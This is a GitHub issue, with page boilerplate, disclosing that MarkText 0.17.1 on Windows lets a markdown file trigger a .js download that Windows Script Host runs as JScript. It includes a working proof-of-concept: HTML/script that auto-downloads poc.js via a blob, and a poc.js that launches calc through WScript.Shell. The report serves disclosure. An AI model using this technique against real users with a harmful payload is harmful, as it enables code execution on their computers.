You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Although marktext filters most dangeruos suffix, it still retains the .js file which will be recognized as WSH(Windows Script Host) JScript on Windows operating system. Users click on evil markdown file may cause code execution.
<!-- auto download !--><html><script>varblob=newBlob(['var WshShell = new ActiveXObject("WScript.Shell");var ret = WshShell.run("calc");if (ret == 0)WScript.Echo("You were hacked.");WScript.Quit();'],{type:'application/js'});vara=document.createElement('a');a.href=window.URL.createObjectURL(blob);a.download='poc.js';a.click();</script></html><!-- click to download !--><ahref="http://127.0.0.1:8000/poc.js" download="poc.js">CLICK~~</a>
poc.js
varWshShell=newActiveXObject("WScript.Shell");varret=WshShell.run("calc");if(ret==0)WScript.Echo("You were hacked.")WScript.Quit();
The text was updated successfully, but these errors were encountered:
liyansong2018
changed the title
Typora on Windows doesn't filter WSH JScript, which may cause code execution
MarkText on Windows doesn't filter WSH JScript, which may cause code execution
Feb 9, 2023
Description
Although marktext filters most dangeruos suffix, it still retains the
.js
file which will be recognized as WSH(Windows Script Host) JScript on Windows operating system. Users click on evil markdown file may cause code execution.Version: 0.17.1(latest)
Attachment
poc.md
poc.html
poc.js
The text was updated successfully, but these errors were encountered: